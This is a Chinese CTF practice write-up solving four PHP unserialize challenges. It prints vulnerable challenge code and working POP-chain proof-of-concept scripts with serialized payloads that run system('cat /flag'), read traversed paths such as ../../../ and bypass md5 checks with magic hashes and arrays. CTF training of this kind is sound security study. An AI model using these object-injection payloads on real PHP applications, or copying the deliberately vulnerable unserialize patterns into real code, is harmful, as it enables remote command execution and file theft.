今天课比较多,只刷了4个题还是反序列化。明天继续反序列化
1.[第五空间 2021]pklovecloud
pop链比较简单就不分析了
<?php
include 'flag.php';
class pkshow
{
function echo_name()
{
return "Pk very safe^.^";
}
}
class acp
{
protected $cinder;
public $neutron;
public $nova;
function __construct()
{
$this->cinder = new pkshow;
}
function __toString()
{
if (isset($this->cinder))
return $this->cinder->echo_name();
}
}
class ace
{
public $filename;
public $openstack;
public $docker;
function echo_name()
{
$this->openstack = unserialize($this->docker);
$this->openstack->neutron = $heat;
if($this->openstack->neutron === $this->openstack->nova)
{
$file = "./{$this->filename}";
if (file_get_contents($file))
{
return file_get_contents($file);
}
else
{
return "keystone lost~";
}
}
}
}
if (isset($_GET['pks']))
{
$logData = unserialize($_GET['pks']);
echo $logData;
}
else
{
highlight_file(__file__);
}
?>
下面的if的条件来分析一下
$this->openstack->neutron === $this->openstack->nova
<?php
class OpenStack {
public $neutron;
public $nova;
}
// 创建一个OpenStack对象
$openstack = new OpenStack();
$openstack->neutron = "value"; // 设置neutron属性的值
$openstack->nova = "value"; // 设置nova属性的值
// 序列化这个对象
$docker = serialize($openstack);
echo $docker;
?>
O:9:"OpenStack":2:{s:7:"neutron";s:5:"value";s:4:"nova";s:5:"value";}
<?php
class acp
{
protected $cinder;
public $neutron;
public $nova;
function __construct()
{
$this->cinder = new ace();
}
}
class ace
{
public $filename='flag.php';
public $openstack;
public $docker='O:9:"OpenStack":2:{s:7:"neutron";s:5:"value";s:4:"nova";s:5:"value";}';
}
$a=new acp();
echo urlencode(serialize($a));
?>
flag.php出现提示
然后把flag.php改为
../../../nssctfasdasdflag
2.[SWPUCTF 2022 新生赛]ez_1zpop
<?php
error_reporting(0);
class dxg
{
function fmm()
{
return "nonono";
}
}
class lt
{
public $impo='hi';
public $md51='weclome';
public $md52='to NSS';
function __construct()
{
$this->impo = new dxg;
}
function __wakeup()
{
$this->impo = new dxg;
return $this->impo->fmm();
}
function __toString()
{
if (isset($this->impo) && md5($this->md51) == md5($this->md52) && $this->md51 != $this->md52)
return $this->impo->fmm();
}
function __destruct()
{
echo $this;
}
}
class fin
{
public $a;
public $url = 'https://www.ctfer.vip';
public $title;
function fmm()
{
$b = $this->a;
$b($this->title);
}
}
if (isset($_GET['NSS'])) {
$Data = unserialize($_GET['NSS']);
} else {
highlight_file(__file__);
}
pop链
fin fmm a=system title=ls
lt_tostring impo=new fin() md51=a[] md51=b[]
lt_destruct _wakeup()绕过
我想的是用数组去绕过比较,发现不行,看了wp他们用的若比较
$a->md51="s155964671a";
$a->md52="s214587387a";
public $md51='240610708';
public $md52='QNKCDZO';
poc
<?php
class lt
{
public $impo;
public $md51='s214587387a';
public $md52='s155964671a';
}
class fin
{
public $a='system';
public $url = 'https://www.ctfer.vip';
public $title='cat /flag';
}
$a=new lt();
$a->impo=new fin();
echo serialize($a);
O:2:"lt":3:{s:4:"impo";O:3:"fin":3:{s:1:"a";s:6:"system";s:3:"url";s:21:"https://www.ctfer.vip";s:5:"title";s:9:"cat /flag";}s:4:"md51";s:11:"s214587387a";s:4:"md52";s:11:"s155964671a";}
注意_wakeup()绕过
3. [MoeCTF 2021]unserialize
<?php
class entrance
{
public $start;
function __construct($start)
{
$this->start = $start;
}
function __destruct()
{
$this->start->helloworld();
}
}
class springboard
{
public $middle;
function __call($name, $arguments)
{
echo $this->middle->hs;
}
}
class evil
{
public $end;
function __construct($end)
{
$this->end = $end;
}
function __get($Attribute)
{
eval($this->end);
}
}
if(isset($_GET['serialize'])) {
unserialize($_GET['serialize']);
} else {
highlight_file(__FILE__);
}
pop分析
evil _get $end=system("ls");
springboard _call $middle=new evil()
entrance _destruct $start=new springboard()
poc
<?php
class entrance
{
public $start;
}
class springboard
{
public $middle;
}
class evil
{
public $end='system("cat /flag");';
}
$a=new entrance();
$a->start=new springboard();
$a->start->middle=new evil();
echo serialize($a);
O:8:"entrance":1:{s:5:"start";O:11:"springboard":1:{s:6:"middle";O:4:"evil":1:{s:3:"end";s:20:"system("cat /flag");";}}}
4. [FSCTF 2023]ez_php1
md5($a)==md5($b)绕过 ?b[]=a&a[]=b FL_AG=1
<?php
highlight_file(__FILE__);
error_reporting(0);
include "globals.php";
$a = $_GET['b'];
$b = $_GET['a'];
if($a!=$b&&md5($a)==md5($b))
{
echo "!!!";
$c = $_POST['FL_AG'];
if(isset($c))
{
if (preg_match('/^.*(flag).*$/', $ja)) {
echo 'You are bad guy!!!';
}
else {
echo "Congratulation!!";
echo $hint1;
}
}
else {
echo "Please input my love FL_AG";
}
} else{
die("game over!");
}
?>
自信的人直接手写playload ?str=s:10:"YES I love";
<?php
highlight_file(__FILE__);
error_reporting(0);
class Clazz
{
public $a;
public $b;
public function __wakeup()
{
$this->a = file_get_contents("php://filter/read=convert.base64-encode/resource=g0t_f1ag.php");
}
public function __destruct()
{
echo $this->b;
}
}
@unserialize($_POST['data']);
?>
继续手写poc
不明白的看这个PHP反序列化(231119)-CSDN博客